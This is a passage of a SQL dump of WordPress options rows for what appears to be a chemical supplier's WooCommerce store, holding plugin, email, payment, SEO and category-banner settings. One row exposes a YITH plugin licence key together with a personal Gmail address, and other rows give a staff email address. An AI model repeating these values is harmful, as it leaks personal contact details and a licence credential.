INSERT INTO `wp_options` VALUES (241, 'woocommerce_registration_generate_username', 'yes', 'no'); 
INSERT INTO `wp_options` VALUES (242, 'woocommerce_registration_generate_password', 'no', 'no'); 
INSERT INTO `wp_options` VALUES (243, 'woocommerce_myaccount_orders_endpoint', '', 'yes'); 
INSERT INTO `wp_options` VALUES (244, 'woocommerce_myaccount_view_order_endpoint', '', 'yes'); 
INSERT INTO `wp_options` VALUES (246, 'woocommerce_myaccount_downloads_endpoint', '', 'yes'); 
INSERT INTO `wp_options` VALUES (248, 'woocommerce_myaccount_edit_account_endpoint', 'edit-account', 'yes'); 
INSERT INTO `wp_options` VALUES (249, 'woocommerce_myaccount_edit_address_endpoint', 'edit-address', 'yes'); 
INSERT INTO `wp_options` VALUES (250, 'woocommerce_myaccount_payment_methods_endpoint', '', 'yes'); 
INSERT INTO `wp_options` VALUES (251, 'woocommerce_myaccount_lost_password_endpoint', 'lost-password', 'yes'); 
INSERT INTO `wp_options` VALUES (252, 'woocommerce_logout_endpoint', 'customer-logout', 'yes'); 
INSERT INTO `wp_options` VALUES (253, 'woocommerce_email_from_name', 'Miller-Stephenson2', 'no'); 
INSERT INTO `wp_options` VALUES (254, 'woocommerce_email_from_address', 'ddillulio@mschem.com', 'no'); 
INSERT INTO `wp_options` VALUES (255, 'woocommerce_email_header_image', '', 'no'); 
INSERT INTO `wp_options` VALUES (256, 'woocommerce_email_footer_text', 'Miller-Stephenson', 'no'); 
INSERT INTO `wp_options` VALUES (257, 'woocommerce_email_base_color', '#557da1', 'no'); 
INSERT INTO `wp_options` VALUES (258, 'woocommerce_email_background_color', '#f5f5f5', 'no'); 
INSERT INTO `wp_options` VALUES (259, 'woocommerce_email_body_background_color', '#fdfdfd', 'no'); 
INSERT INTO `wp_options` VALUES (260, 'woocommerce_email_text_color', '#505050', 'no'); 
INSERT INTO `wp_options` VALUES (261, 'woocommerce_api_enabled', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (267, 'yit_recently_activated', 'a:0:{}', 'yes'); 
INSERT INTO `wp_options` VALUES (272, 'recently_activated', 'a:1:{s:43:"product-enquiry-pro/product-enquiry-pro.php";i:1501507562;}', 'yes'); 
INSERT INTO `wp_options` VALUES (273, 'woocommerce_admin_notices', 'a:0:{}', 'yes'); 
INSERT INTO `wp_options` VALUES (274, 'yith_wcwl_frontend_css_colors', 's:1159:"a:10:{s:15:"add_to_wishlist";a:3:{s:10:"background";s:7:"#333333";s:5:"color";s:7:"#FFFFFF";s:12:"border_color";s:7:"#333333";}s:21:"add_to_wishlist_hover";a:3:{s:10:"background";s:7:"#4F4F4F";s:5:"color";s:7:"#FFFFFF";s:12:"border_color";s:7:"#4F4F4F";}s:11:"add_to_cart";a:3:{s:10:"background";s:7:"#333333";s:5:"color";s:7:"#FFFFFF";s:12:"border_color";s:7:"#333333";}s:17:"add_to_cart_hover";a:3:{s:10:"background";s:7:"#4F4F4F";s:5:"color";s:7:"#FFFFFF";s:12:"border_color";s:7:"#4F4F4F";}s:14:"button_style_1";a:3:{s:10:"background";s:7:"#333333";s:5:"color";s:7:"#FFFFFF";s:12:"border_color";s:7:"#333333";}s:20:"button_style_1_hover";a:3:{s:10:"background";s:7:"#4F4F4F";s:5:"color";s:7:"#FFFFFF";s:12:"border_color";s:7:"#4F4F4F";}s:14:"button_style_2";a:3:{s:10:"background";s:7:"#FFFFFF";s:5:"color";s:7:"#858484";s:12:"border_color";s:7:"#c6c6c6";}s:20:"button_style_2_hover";a:3:{s:10:"background";s:7:"#4F4F4F";s:5:"color";s:7:"#FFFFFF";s:12:"border_color";s:7:"#4F4F4F";}s:14:"wishlist_table";a:3:{s:10:"background";s:7:"#FFFFFF";s:5:"color";s:7:"#6d6c6c";s:12:"border_color";s:7:"#FFFFFF";}s:7:"headers";a:1:{s:10:"background";s:7:"#F4F4F4";}}";', 'yes'); 
INSERT INTO `wp_options` VALUES (279, 'widget_woocommerce_widget_cart', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (280, 'widget_woocommerce_layered_nav_filters', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (281, 'widget_woocommerce_layered_nav', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (282, 'widget_woocommerce_price_filter', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (283, 'widget_woocommerce_product_categories', 'a:6:{i:5;a:7:{s:5:"title";s:18:"Product Categories";s:7:"orderby";s:5:"order";s:8:"dropdown";i:0;s:5:"count";i:1;s:12:"hierarchical";i:1;s:18:"show_children_only";i:1;s:10:"hide_empty";i:0;}i:8;a:7:{s:5:"title";s:18:"Product Categories";s:7:"orderby";s:4:"name";s:8:"dropdown";i:1;s:5:"count";i:0;s:12:"hierarchical";i:0;s:18:"show_children_only";i:0;s:10:"hide_empty";i:0;}i:10;a:7:{s:5:"title";s:18:"Product Categories";s:7:"orderby";s:4:"name";s:8:"dropdown";i:0;s:5:"count";i:0;s:12:"hierarchical";i:1;s:18:"show_children_only";i:0;s:10:"hide_empty";i:0;}i:11;a:7:{s:5:"title";s:8:"Products";s:7:"orderby";s:4:"name";s:8:"dropdown";i:0;s:5:"count";i:1;s:12:"hierarchical";i:1;s:18:"show_children_only";i:0;s:10:"hide_empty";i:0;}i:12;a:7:{s:5:"title";s:18:"Product Categories";s:7:"orderby";s:4:"name";s:8:"dropdown";i:0;s:5:"count";i:0;s:12:"hierarchical";i:1;s:18:"show_children_only";i:0;s:10:"hide_empty";i:0;}s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (284, 'widget_woocommerce_product_search', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (285, 'widget_woocommerce_product_tag_cloud', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (286, 'widget_woocommerce_products', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (287, 'widget_woocommerce_rating_filter', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (288, 'widget_woocommerce_recent_reviews', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (289, 'widget_woocommerce_recently_viewed_products', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (290, 'widget_woocommerce_top_rated_products', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (291, 'widget_yith_woocommerce_ajax_search', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (292, 'widget_upsell_widget', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (295, 'woocommerce_meta_box_errors', 'a:0:{}', 'yes'); 
INSERT INTO `wp_options` VALUES (298, 'yith_wcwl_enabled', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (299, 'yith_wcwl_wishlist_title', 'Miller-Stephenson Chemicals - WhishList', 'yes'); 
INSERT INTO `wp_options` VALUES (300, 'yith_wcwl_wishlist_page_id', '5', 'yes'); 
INSERT INTO `wp_options` VALUES (301, 'yith_wcwl_redirect_cart', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (302, 'yith_wcwl_remove_after_add_to_cart', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (303, 'yith_wcwl_add_to_wishlist_text', 'Add to Wishlist', 'yes'); 
INSERT INTO `wp_options` VALUES (304, 'yith_wcwl_browse_wishlist_text', 'Browse Wishlist', 'yes'); 
INSERT INTO `wp_options` VALUES (305, 'yith_wcwl_already_in_wishlist_text', 'The product is already in the wishlist!', 'yes'); 
INSERT INTO `wp_options` VALUES (306, 'yith_wcwl_product_added_text', 'Product added!', 'yes'); 
INSERT INTO `wp_options` VALUES (307, 'yith_wcwl_add_to_cart_text', 'Add to Cart', 'yes'); 
INSERT INTO `wp_options` VALUES (308, 'yith_wcwl_price_show', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (309, 'yith_wcwl_add_to_cart_show', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (310, 'yith_wcwl_stock_show', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (311, 'yith_wcwl_show_dateadded', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (312, 'yith_wcwl_repeat_remove_button', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (313, 'yith_wcwl_use_button', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (314, 'yith_wcwl_custom_css', '', 'yes'); 
INSERT INTO `wp_options` VALUES (315, 'yith_wcwl_frontend_css', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (316, 'yith_wcwl_rounded_corners', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (317, 'yith_wcwl_add_to_wishlist_icon', 'none', 'yes'); 
INSERT INTO `wp_options` VALUES (318, 'yith_wcwl_add_to_cart_icon', 'fa-shopping-cart', 'yes'); 
INSERT INTO `wp_options` VALUES (319, 'yith_wcwl_share_fb', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (320, 'yith_wcwl_share_twitter', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (321, 'yith_wcwl_share_pinterest', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (322, 'yith_wcwl_share_googleplus', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (323, 'yith_wcwl_share_email', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (324, 'yith_wcwl_socials_title', 'My wishlist on Miller-Stephenson Chemicals', 'yes'); 
INSERT INTO `wp_options` VALUES (325, 'yith_wcwl_socials_text', '', 'yes'); 
INSERT INTO `wp_options` VALUES (326, 'yith_wcwl_socials_image_url', '', 'yes'); 
INSERT INTO `wp_options` VALUES (327, 'yith_wfbt_enable_integration', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (328, 'yith-wcwl-page-id', '5', 'yes'); 
INSERT INTO `wp_options` VALUES (329, 'yith_wcwl_version', '2.0.16', 'yes'); 
INSERT INTO `wp_options` VALUES (330, 'yith_wcwl_db_version', '2.0.0', 'yes'); 
INSERT INTO `wp_options` VALUES (332, 'yith_wcas_general_videobox', 'a:7:{s:11:"plugin_name";s:28:"YITH WooCommerce Ajax Search";s:18:"title_first_column";s:30:"Discover the Advanced Features";s:24:"description_first_column";s:93:"Upgrade to the PREMIUM VERSION\r\nof YITH WOOCOMMERCE AJAX SEARCH to benefit from all features!";s:5:"video";a:3:{s:8:"video_id";s:9:"118917627";s:15:"video_image_url";s:119:"https://www.miller-stephenson.com/wp-content/plugins/yith-woocommerce-ajax-search/assets/images/ajax-search-premium.jpg";s:17:"video_description";s:28:"YITH WooCommerce Ajax Search";}s:19:"title_second_column";s:28:"Get Support and Pro Features";s:25:"description_second_column";s:205:"By purchasing the premium version of the plugin, you will take advantage of the advanced features of the product and you will get one year of free updates and support through our platform available 24h/24.";s:6:"button";a:2:{s:4:"href";s:65:"https://yithemes.com/themes/plugins/yith-woocommerce-ajax-search/";s:5:"title";s:28:"Get Support and Pro Features";}}', 'yes'); 
INSERT INTO `wp_options` VALUES (333, 'yith_wcas_search_input_label', 'Search for products', 'yes'); 
INSERT INTO `wp_options` VALUES (334, 'yith_wcas_search_submit_label', 'Search', 'yes'); 
INSERT INTO `wp_options` VALUES (335, 'yith_wcas_min_chars', '3', 'yes'); 
INSERT INTO `wp_options` VALUES (336, 'yith_wcas_posts_per_page', '3', 'yes'); 
INSERT INTO `wp_options` VALUES (337, 'yith_wcwl_general_videobox', 'a:7:{s:11:"plugin_name";s:25:"YITH WooCommerce Wishlist";s:18:"title_first_column";s:30:"Discover the Advanced Features";s:24:"description_first_column";s:89:"Upgrade to the PREMIUM VERSION\nof YITH WOOCOMMERCE WISHLIST to benefit from all features!";s:5:"video";a:3:{s:8:"video_id";s:9:"118797844";s:15:"video_image_url";s:109:"https://www.miller-stephenson.com/wp-content/plugins/yith-woocommerce-wishlist//assets/images/video-thumb.jpg";s:17:"video_description";s:0:"";}s:19:"title_second_column";s:28:"Get Support and Pro Features";s:25:"description_second_column";s:205:"By purchasing the premium version of the plugin, you will take advantage of the advanced features of the product and you will get one year of free updates and support through our platform available 24h/24.";s:6:"button";a:2:{s:4:"href";s:79:"https://yithemes.com/themes/plugins/yith-woocommerce-wishlist/?refer_id=1030585";s:5:"title";s:28:"Get Support and Pro Features";}}', 'yes'); 
INSERT INTO `wp_options` VALUES (345, 'nf_admin_notice', 'a:3:{s:14:"allow_tracking";a:2:{s:5:"start";s:9:"8/15/2016";s:3:"int";i:0;}s:10:"three_info";a:3:{s:5:"start";s:9:"8/15/2016";s:3:"int";i:0;s:9:"dismissed";i:1;}s:16:"one_week_support";a:3:{s:5:"start";s:9:"8/22/2016";s:3:"int";i:7;s:9:"dismissed";i:1;}}', 'yes'); 
INSERT INTO `wp_options` VALUES (346, 'ninja_forms_do_not_allow_tracking', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (350, 'woocommerce_paypal-braintree_settings', 'a:1:{s:7:"enabled";s:2:"no";}', 'yes'); 
INSERT INTO `wp_options` VALUES (351, 'woocommerce_stripe_settings', 'a:1:{s:7:"enabled";s:2:"no";}', 'yes'); 
INSERT INTO `wp_options` VALUES (352, 'woocommerce_paypal_settings', 'a:2:{s:7:"enabled";s:2:"no";s:5:"email";s:20:"ddillulio@mschem.com";}', 'yes'); 
INSERT INTO `wp_options` VALUES (353, 'woocommerce_cheque_settings', 'a:1:{s:7:"enabled";s:2:"no";}', 'yes'); 
INSERT INTO `wp_options` VALUES (354, 'woocommerce_bacs_settings', 'a:1:{s:7:"enabled";s:2:"no";}', 'yes'); 
INSERT INTO `wp_options` VALUES (355, 'woocommerce_cod_settings', 'a:1:{s:7:"enabled";s:2:"no";}', 'yes'); 
INSERT INTO `wp_options` VALUES (356, 'woocommerce_allow_tracking', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (386, 'nf_converted_forms', 'a:3:{i:0;s:1:"6";i:1;s:1:"7";i:2;s:1:"8";}', 'yes'); 
INSERT INTO `wp_options` VALUES (447, 'nav_menu_options', 'a:2:{i:0;b:0;s:8:"auto_add";a:1:{i:0;i:14;}}', 'yes'); 
INSERT INTO `wp_options` VALUES (482, 'woocommerce_permalinks', 'a:4:{s:13:"category_base";s:9:"chemicals";s:8:"tag_base";s:11:"product-tag";s:14:"attribute_base";s:0:"";s:12:"product_base";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (686, 'woocsv_separator', ',', 'yes'); 
INSERT INTO `wp_options` VALUES (687, 'woocsv_skip_first_line', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (688, 'woocsv_blocksize', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (689, 'woocsv_merge_products', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (690, 'woocsv_add_to_categories', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (691, 'woocsv_debug', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (692, 'woocsv_match_by', 'sku', 'yes'); 
INSERT INTO `wp_options` VALUES (693, 'woocsv_roles', 'a:1:{i:0;s:12:"shop_manager";}', 'yes'); 
INSERT INTO `wp_options` VALUES (694, 'woocsv_match_author_by', 'login', 'yes'); 
INSERT INTO `wp_options` VALUES (695, 'woocsv_convert_to_utf8', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (696, 'woocsv-options', 'a:10:{s:16:"woocsv_separator";s:1:",";s:22:"woocsv_skip_first_line";i:1;s:16:"woocsv_blocksize";i:1;s:21:"woocsv_merge_products";i:1;s:24:"woocsv_add_to_categories";i:1;s:12:"woocsv_debug";i:0;s:15:"woocsv_match_by";s:3:"sku";s:12:"woocsv_roles";a:1:{i:0;s:12:"shop_manager";}s:22:"woocsv_match_author_by";s:5:"login";s:22:"woocsv_convert_to_utf8";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (697, 'woocsv_options', 'a:10:{s:16:"woocsv_separator";s:1:",";s:22:"woocsv_skip_first_line";i:1;s:16:"woocsv_blocksize";i:1;s:21:"woocsv_merge_products";i:1;s:24:"woocsv_add_to_categories";i:1;s:12:"woocsv_debug";i:0;s:15:"woocsv_match_by";s:3:"sku";s:12:"woocsv_roles";a:1:{i:0;s:12:"shop_manager";}s:22:"woocsv_match_author_by";s:5:"login";s:22:"woocsv_convert_to_utf8";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (912, 'pa_sizes-available_children', 'a:0:{}', 'yes'); 
INSERT INTO `wp_options` VALUES (1296, 'woocommerce_custom_product_tabs_lite_db_version', '1.5.0', 'yes'); 
INSERT INTO `wp_options` VALUES (1467, 'yith_wctm_general_videobox', 'a:7:{s:11:"plugin_name";s:28:"YITH WooCommerce Tab Manager";s:18:"title_first_column";s:30:"Discover the Advanced Features";s:24:"description_first_column";s:92:"Upgrade to the PREMIUM VERSION\nof YITH WooCommerce Tab Manager to benefit from all features!";s:5:"video";a:3:{s:8:"video_id";s:9:"126788273";s:15:"video_image_url";s:129:"https://www.miller-stephenson.com/wp-content/plugins/yith-woocommerce-tab-manager/assets//images/yith-woocommerce-tab-manager.jpg";s:17:"video_description";s:28:"YITH WooCommerce Tab Manager";}s:19:"title_second_column";s:28:"Get Support and Pro Features";s:25:"description_second_column";s:205:"By purchasing the premium version of the plugin, you will take advantage of the advanced features of the product and you will get one year of free updates and support through our platform available 24h/24.";s:6:"button";a:2:{s:4:"href";s:65:"https://yithemes.com/themes/plugins/yith-woocommerce-tab-manager/";s:5:"title";s:28:"Get Support and Pro Features";}}', 'yes'); 
INSERT INTO `wp_options` VALUES (1468, 'ywtm_enable_plugin', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (1483, 'ywtm_hide_wc_tab_mobile', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (1484, 'ywtm_hide_tab_mobile', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (1485, 'ywtm_google_api_key', '', 'yes'); 
INSERT INTO `wp_options` VALUES (1486, 'ywtm_custom_style', '', 'yes'); 
INSERT INTO `wp_options` VALUES (1487, 'yit_plugin_licence_activation', 'a:1:{s:28:"yith-woocommerce-tab-manager";a:9:{s:5:"email";s:19:"qtrader99@gmail.com";s:11:"licence_key";s:36:"b151c5d8-31d2-4e99-ae8a-a57bd674ad62";s:15:"licence_expires";i:1503014400;s:7:"message";s:23:"Licence key has expired";s:9:"activated";b:0;s:16:"activation_limit";s:1:"1";s:20:"activation_remaining";i:0;s:13:"is_membership";b:0;s:11:"status_code";s:3:"106";}}', 'yes'); 
INSERT INTO `wp_options` VALUES (2496, 'aioseop_options', 'a:91:{s:12:"aiosp_donate";N;s:16:"aiosp_home_title";N;s:22:"aiosp_home_description";s:0:"";s:20:"aiosp_togglekeywords";i:1;s:19:"aiosp_home_keywords";N;s:26:"aiosp_use_static_home_info";i:0;s:9:"aiosp_can";i:1;s:30:"aiosp_no_paged_canonical_links";i:0;s:31:"aiosp_customize_canonical_links";i:0;s:22:"aiosp_can_set_protocol";s:4:"auto";s:20:"aiosp_rewrite_titles";i:1;s:20:"aiosp_force_rewrites";i:1;s:24:"aiosp_use_original_title";i:0;s:16:"aiosp_cap_titles";i:1;s:14:"aiosp_cap_cats";i:1;s:28:"aiosp_home_page_title_format";s:12:"%page_title%";s:23:"aiosp_page_title_format";s:27:"%page_title% | %blog_title%";s:23:"aiosp_post_title_format";s:27:"%post_title% | %blog_title%";s:27:"aiosp_category_title_format";s:31:"%category_title% | %blog_title%";s:26:"aiosp_archive_title_format";s:30:"%archive_title% | %blog_title%";s:23:"aiosp_date_title_format";s:21:"%date% | %blog_title%";s:25:"aiosp_author_title_format";s:23:"%author% | %blog_title%";s:22:"aiosp_tag_title_format";s:20:"%tag% | %blog_title%";s:25:"aiosp_search_title_format";s:23:"%search% | %blog_title%";s:24:"aiosp_description_format";s:13:"%description%";s:22:"aiosp_404_title_format";s:33:"Nothing found for %request_words%";s:18:"aiosp_paged_format";s:14:" - Part %page%";s:17:"aiosp_enablecpost";s:2:"on";s:17:"aiosp_cpostactive";a:2:{i:0;s:4:"post";i:1;s:4:"page";}s:19:"aiosp_cpostadvanced";i:0;s:18:"aiosp_cpostnoindex";a:0:{}s:19:"aiosp_cpostnofollow";a:0:{}s:16:"aiosp_cpostnoodp";a:0:{}s:17:"aiosp_cpostnoydir";a:0:{}s:17:"aiosp_cposttitles";i:0;s:21:"aiosp_posttypecolumns";a:2:{i:0;s:4:"post";i:1;s:4:"page";}s:15:"aiosp_admin_bar";s:2:"on";s:23:"aiosp_custom_menu_order";s:2:"on";s:19:"aiosp_google_verify";s:0:"";s:17:"aiosp_bing_verify";s:0:"";s:22:"aiosp_pinterest_verify";s:0:"";s:22:"aiosp_google_publisher";s:0:"";s:28:"aiosp_google_disable_profile";i:0;s:29:"aiosp_google_sitelinks_search";N;s:26:"aiosp_google_set_site_name";N;s:30:"aiosp_google_specify_site_name";N;s:28:"aiosp_google_author_advanced";i:0;s:28:"aiosp_google_author_location";a:1:{i:0;s:3:"all";}s:29:"aiosp_google_enable_publisher";s:2:"on";s:30:"aiosp_google_specify_publisher";N;s:25:"aiosp_google_analytics_id";N;s:32:"aiosp_ga_use_universal_analytics";i:0;s:25:"aiosp_ga_advanced_options";s:2:"on";s:15:"aiosp_ga_domain";N;s:21:"aiosp_ga_multi_domain";i:0;s:21:"aiosp_ga_addl_domains";N;s:21:"aiosp_ga_anonymize_ip";N;s:28:"aiosp_ga_display_advertising";N;s:22:"aiosp_ga_exclude_users";N;s:29:"aiosp_ga_track_outbound_links";i:0;s:25:"aiosp_ga_link_attribution";i:0;s:27:"aiosp_ga_enhanced_ecommerce";i:0;s:20:"aiosp_use_categories";i:0;s:26:"aiosp_use_tags_as_keywords";i:1;s:32:"aiosp_dynamic_postspage_keywords";i:1;s:22:"aiosp_category_noindex";i:1;s:26:"aiosp_archive_date_noindex";i:1;s:28:"aiosp_archive_author_noindex";i:1;s:18:"aiosp_tags_noindex";i:0;s:20:"aiosp_search_noindex";i:0;s:17:"aiosp_404_noindex";i:0;s:17:"aiosp_tax_noindex";a:0:{}s:23:"aiosp_paginated_noindex";i:0;s:24:"aiosp_paginated_nofollow";i:0;s:11:"aiosp_noodp";i:0;s:12:"aiosp_noydir";i:0;s:18:"aiosp_skip_excerpt";i:0;s:27:"aiosp_generate_descriptions";i:1;s:20:"aiosp_run_shortcodes";i:0;s:33:"aiosp_hide_paginated_descriptions";i:0;s:32:"aiosp_dont_truncate_descriptions";i:0;s:19:"aiosp_schema_markup";i:1;s:20:"aiosp_unprotect_meta";i:0;s:33:"aiosp_redirect_attachement_parent";i:0;s:14:"aiosp_ex_pages";s:0:"";s:20:"aiosp_post_meta_tags";s:0:"";s:20:"aiosp_page_meta_tags";s:0:"";s:21:"aiosp_front_meta_tags";s:0:"";s:20:"aiosp_home_meta_tags";s:0:"";s:12:"aiosp_do_log";N;s:19:"last_active_version";s:7:"2.3.9.1";}', 'yes'); 
INSERT INTO `wp_options` VALUES (2505, 'WPLANG', '', 'yes'); 
INSERT INTO `wp_options` VALUES (2542, 'updraftplus_unlocked_fd', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (2543, 'updraftplus_last_lock_time_fd', '2016-11-04 01:22:23', 'yes'); 
INSERT INTO `wp_options` VALUES (2544, 'updraftplus_semaphore_fd', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (2545, 'updraft_last_scheduled_fd', '1478222542', 'yes'); 
INSERT INTO `wp_options` VALUES (2550, 'updraftplus_unlocked_', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (2551, 'updraftplus_last_lock_time_', '2016-08-18 23:35:04', 'yes'); 
INSERT INTO `wp_options` VALUES (2552, 'updraftplus_semaphore_', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (2604, 'z_taxonomy_image9', 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/KRYTOX_AUTHORIZED-e1471567810981.jpg', 'yes'); 
INSERT INTO `wp_options` VALUES (2611, 'taxonomy_image_link9', '', 'yes'); 
INSERT INTO `wp_options` VALUES (2612, 'taxonomy_image_title9', 'Krytox Authorized Dealer', 'yes'); 
INSERT INTO `wp_options` VALUES (2613, 'taxonomy_image_tab9', '', 'yes'); 
INSERT INTO `wp_options` VALUES (2620, 'categoryimage_9', '549', 'yes'); 
INSERT INTO `wp_options` VALUES (2753, 'taxonomy_term_9', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (3007, 'taxonomy_term_27', 'a:5:{s:13:"banner_url_id";s:4:"1232";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (3012, 'taxonomy_term_29', 'a:5:{s:13:"banner_url_id";s:4:"1232";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (3016, 'taxonomy_term_28', 'a:5:{s:13:"banner_url_id";s:4:"1232";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (3020, 'taxonomy_term_30', 'a:5:{s:13:"banner_url_id";s:4:"1232";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (3027, 'taxonomy_term_31', 'a:5:{s:13:"banner_url_id";s:4:"1232";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (3036, 'taxonomy_term_93', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (3052, 'taxonomy_term_95', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (3164, 'taxonomy_term_96', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (3168, 'taxonomy_term_97', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (3690, 'taxonomy_term_115', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (3755, 'aka_columns', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (3756, 'aka_token', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (3955, 'taxonomy_term_98', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (3978, 'taxonomy_term_100', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (3982, 'taxonomy_term_101', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (3996, 'taxonomy_term_122', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (4000, 'taxonomy_term_123', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (4004, 'taxonomy_term_124', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
